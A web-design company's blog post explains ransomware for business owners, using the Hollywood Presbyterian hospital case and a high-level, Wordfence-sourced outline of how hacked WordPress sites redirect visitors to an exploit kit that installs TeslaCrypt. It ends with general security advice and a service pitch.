Ransomware – Holding your business hostage

One of the latest, fastest growing and more sinister cyber-scams that is hitting the Internet by storm is “Ransomware”. This malware attack prevents you from accessing your website and/or data, until a ransom payment is made via an online payment method, usually in bitcoins (Internet currency).

The most recent, high profile attack took place when the Hollywood Presbyterian Medical Center was infected with this malware. According to staff at the centre, the infection took out the systems responsible for CT scans, documentation, lab work, pharmacy functions and electronic communications. The siege lasted for approximately 10 – 12 days and in that time a state of emergency was declared, and patients were reportedly moved to other hospitals. In order to put an end to the electronic hostage situation, the medical centre paid 40 bitcoins, approximately $17,000.

So, how on earth did this happen?

In order for this type of attack to work, the hackers rely on security vulnerabilities existing on multiple systems. They first require multiple websites with vulnerabilities to carry out the malware attack, they then require a site visitor who has vulnerable applications on their computer to activate the ransomware installation.

A more detailed guide of the steps involved has been provided by WordPress security experts Wordfence. These details focus on WordPress vulnerabilities as WordPress is the most popular web publishing system on the planet.

  1. A WordPress site is hacked through any method available. That may be a brute force password guessing attack or by exploiting a vulnerability in a plugin, theme or core.
  2. The attacker installs code on the WordPress site that redirects visitors to other infected websites that are running the Nuclear Exploit Kit. The redirects may happen through a series of websites to try and prevent web browsers and Google from warning you that a site is infected. The sites involved in the redirect change frequently.
  3. When a visitor to the infected site is redirected, the nuclear exploit kit searches for vulnerabilities in the site visitor’s Flash Plugin, Microsoft Silverlight, Adobe Reader or Internet Explorer.
  4. If Nuclear finds a vulnerability, it exploits the visitor machine and installs the TeslaCrypt Ransomware.
  5. The ransomware then encrypts all files on the workstation and extorts the owner into paying to get their system decrypted.

Courtesy of Wordfence – https://www.wordfence.com/blog/2016/02/wordpress-ransomware-teslacrypt-mint-linux-hacked

When the system is infected with the TeslaCrypt Ransomware, you will see the following screen.

TeslaCrypt Ransomware Screenshot

Courtesy of Bromium Labs & Wordfence

What should you do?

Just like your computer’s operating system, your website Content Management System (CMS) and various plugins should be secure from known vulnerabilities when developed, but Hackers are always looking for new ways to exploit your website. In order to ensure your scripts and website assets are protected for the long term it is essential that any vulnerable scripts are updated, malware scans are performed and files are monitored for changes. There are various WordPress plugins available that will allow you to perform these tasks or you can get them managed by your website developers. At Dreamscape we are able to manage your website’s security regardless of whether you host with us or had your website developed by our team.

Securing your web site is critically important, not just to protect your investment & reputation, but to protect your site visitors. Get in touch if you would like to discuss your sites security further.